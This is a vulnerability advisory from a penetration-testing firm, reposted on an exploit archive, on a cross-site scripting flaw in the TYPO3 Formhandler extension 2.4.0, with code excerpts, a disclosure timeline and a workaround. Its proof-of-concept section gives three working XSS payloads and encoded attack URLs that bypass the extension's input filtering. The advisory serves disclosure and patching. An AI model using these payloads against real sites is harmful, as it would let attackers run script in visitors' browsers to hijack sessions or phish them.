Exploit the possiblities

TYPO3 Formhandler 2.4.0 Cross Site Scripting

TYPO3 Formhandler 2.4.0 Cross Site Scripting
Posted Jul 27, 2017
Site redteam-pentesting.de

TYPO3 Formhandler version 2.4.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 6cfac9c84c886d0fc069fe4b25cb6045

TYPO3 Formhandler 2.4.0 Cross Site Scripting

Change Mirror Download
Advisory: Cross-Site Scripting in TYPO3 Formhandler Extension

RedTeam Pentesting discovered a cross-site scripting vulnerability (XSS)
in the TYPO3 extension Formhandler.


Details
=======

Product: TYPO3 Formhandler
Affected Versions: 2.4.0 and probably earlier
Fixed Versions: none, project no longer maintained
Vulnerability Type: Cross-site scripting
Security Risk: medium
Vendor URL: http://www.typo3-formhandler.com/formhandler/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-007
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

TYPO3 Formhandler is an extension to build and handle forms on TYPO3
websites.


More Details
============

TYPO3 Formhandler can validate form data and create a pre-filled form
with previous values and error messages, if the data does not comply.
It uses input sanitisation and output encoding as an approach to prevent
XSS when embedding the values in the resulting web page. Input
sanitisation happens in the function "sanitizeValues()" defined in
Classes/Interceptor/RemoveXSS.php line 62ff.[0]:

/**
* This method does XSS checks and escapes malicious data
*
* @param array $values The GET/POST parameters
* @return array The sanitized GET/POST parameters
*/
public function sanitizeValues($values)
{
if (!is_array($values)) {
return [];
}

foreach ($values as $key => $value) {
[...]
$value = \TYPO3\CMS\Core\Utility\GeneralUtility::removeXSS($value);

The function removeXSS() is deprecated in TYPO3 version 8 [1] and
contains a known vulnerability for user-assisted XSS [2].

TYPO3 Formhandler also supports a templating system that uses place
holders that are delimited with three hash-signs, for example:
###auth_code###

Some of these values are user-controlled but not all of them are
properly encoded. For example the auth code is used as follows (see
Classes/View/Form.php, line 519ff.):

if ($this->gp['generated_authCode']) {
$markers['###auth_code###'] = $this->gp['generated_authCode'];
}

But other markers are encoded via htmlspecialchars() (line 513ff):
$markers['###HIDDEN_FIELDS###'] .= '
<input type="hidden" ' . $hiddenActionFieldName . ' id="ieHiddenField-' . htmlspecialchars($this->gp['randomID']) . '" value="1" />
';

Another value that TYPO3 Formhandler uses in forms is a so-called random
ID, that is also obtained from a URL or POST parameter. In combination,
both parameters allow to bypass the removeXSS() function as well and
allow XSS.


Proof of Concept
================

The proof-of-concept URLs are created for the basic file upload example
provided by the TYPO3 Formhandler documentation page [3]. The examples
set the random ID parameter to a value containing the place holder
###auth_code### that contains an additional attack vector. For the
attack vector to be included, the URLs need to be called twice. The
second request needs to include the PHP session cookie that was set in
response to the first request.

In the first example, the auth code bypasses the input sanitisation by
using the placeholder ####### that renders to the empty string:

"><scr######ipt>alert("RedTeam+Pentesting")</script>

In the second example, the XSS code is split between the random ID and
the auth code. The auth code is:

"><img src=x on

And the random ID is:

###auth_code###error='alert(/RedTeam Pentesting/.source)'

The third example uses the known bypass for the removeXSS() function by
setting the auth code to:

"/><a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiUmVkVGVhbSBQZW50ZXN0aW5nIik8L3NjcmlwdD4K">XSS</a>

And using it as the random ID.

------------------------------------------------------------------------
http://example.com/file-upload/basic-file-upload/?id=266&basic-file-upload%5brandomID%5d=%23%23%23auth_code%23%23%23&basic-file-upload%5bgenerated_authCode%5d=%22%3e%3cscr%23%23%23%23%23%23ipt%3ealert%28%22RedTeam+Pentesting%22%29%3c%2fscript%3e

http://example.com/file-upload/basic-file-upload/?id=266&basic-file-upload%5brandomID%5d=%23%23%23auth_code%23%23%23error%3d'alert(/RedTeam%20Pentesting/.source)'&basic-file-upload%5bgenerated_authCode%5d=%22%3e<img+src%3dx+on

http://example.com/file-upload/basic-file-upload/?id=266&basic-file-upload%5brandomID%5d=%23%23%23auth_code%23%23%23&basic-file-upload%5bgenerated_authCode%5d=%20"/><a%20href%3d"data:text/html;base64,PHNjcmlwdD5hbGVydCgiUmVkVGVhbSBQZW50ZXN0aW5nIik8L3NjcmlwdD4K">XSS</a>
------------------------------------------------------------------------


Workaround
==========

A possible workaround might be to patch Classes/View/Form.php to apply
htmlspecialchars() before storing the auth code value for the respective
marker. An unofficial patch from the vendor is available at:
https://github.com/pluspol-interactive/typo3-formhandler/pull/1


Fix
===

None, since the project is no longer maintained.


Security Risk
=============

Attackers can use the vulnerability to execute arbitrary JavaScript on
the target system. Depending on the site it can be used to use and
monitory the session of users, present phishing forms or harm the site's
reputation with false information. Attackers need to get people to open
the respective URLs twice for this attack to work and therefore can only
target individual users. All in all this is considered to be a
medium-risk vulnerability. Depending on the affected site the risk needs
to be adjusted accordingly.


Timeline
========
2016-09-22 Vulnerability identified
2016-10-07 Customer approved disclosure to vendor
2016-10-07 Vendor notified
2016-10-11 Preliminary advisory sent to vendor
2016-10-12 Vendor prepared patch and sent it to TYPO3 security team
2016-10-13 Customer needs time to test the patch and deploy it
2017-07-10 Customer finished testing and deployment of patch
2017-07-17 Vendor agreed to have patch published as PR on Github
2017-07-27 Vendor patch published as pull request for a possibly active fork
2017-07-27 Advisory released


References
==========

[0] https://github.com/reinhardfuehricht/typo3-formhandler/blob/master/Classes/Interceptor/RemoveXSS.php#L63
[1] https://docs.typo3.org/typo3cms/extensions/core/8-dev/Changelog/8.2/Deprecation-76164-DeprecateRemoveXSS.html
[2] https://packetstormsecurity.com/files/137127/typo3-xssbypass.txt
[3] http://examples.typo3-formhandler.com/start/


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschaftsfuhrer: Patrick Hof, Jens Liebchen

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close